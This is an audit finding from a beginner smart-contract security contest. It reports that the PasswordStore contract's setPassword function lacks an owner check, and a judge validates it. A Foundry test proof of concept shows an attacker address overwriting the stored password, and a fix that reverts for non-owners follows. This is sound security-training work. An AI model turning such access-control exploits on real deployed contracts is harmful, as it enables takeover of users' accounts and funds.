First Flight #1: PasswordStore

First Flight #1

Beginner FriendlyFoundry

100 EXP

View results

Previous Next

Submission Details

Severity: high

Valid

Attacker can change the password

Proxy

Summary

An attacker can change the password

Vulnerability Details

Because there is no check for who is the caller, an attacker can easily change the password, even though only the owner should be able to.

Proof Of Concept

In test file PasswordStore.t.sol add this line before the setUp() function.

address attacker = makeAddr("Attacker");

Lastly add the following test at the end of the test file and run it via forge t --mt test_AttackerCanChangePassword -vv

function test_AttackerCanChangePassword() public {

// owner check password before attack

vm.prank(owner);

string memory passwordBeforeAttack = passwordStore.getPassword();

console.log("Password Before Attack:", passwordBeforeAttack); // OUTPUT: myPassword

assertEq(passwordBeforeAttack, "myPassword"); // pass

// attacker performs the attack by changing the password

vm.prank(attacker);

string memory attackerPassword = "attackerPassword";

passwordStore.setPassword(attackerPassword);

// owner check password after attack

vm.prank(owner);

string memory passwordAfterAttack = passwordStore.getPassword();

assertEq(passwordAfterAttack, attackerPassword); // pass

console.log("Password After Attack:", passwordAfterAttack); // OUTPUT: attackerPassword

}

Impact

An attacker can change the password, even though only the owner should be able to do it. This will cause the owner to lose his account, or other plethora of different issues.

Tools Used

Foundry

Recommendations

Make sure the caller is the owner of the contract, if not revert.

Example:

function setPassword(string memory newPassword) external {

if (msg.sender != s_owner) {

revert PasswordStore__NotOwner();

}

s_password = newPassword;

emit SetNetPassword();

}

Updates

Lead Judging Commences

inallhonesty Lead Judge

almost 2 years ago

inallhonesty Lead Judge almost 2 years ago

Submission Judgement Published

Validated

Assigned finding tags:

finding-lacking-access-control

Anyone can call `setPassword` and set a new password contrary to the intended purpose.

Rewards breakdown

nSLOC

This contest has a flat reward structure with the following payouts:

High

100 EXP

Medium

20 EXP

Low

2 EXP

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being carefully reviewed by our judges.

View all submissions

Appeals

This is your time to appeal against judgements on your submissions.

Appeals Review

Appeals are being carefully reviewed by our judges.

Rewards Distribution

The contest is complete and the rewards are being distributed.

View results

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.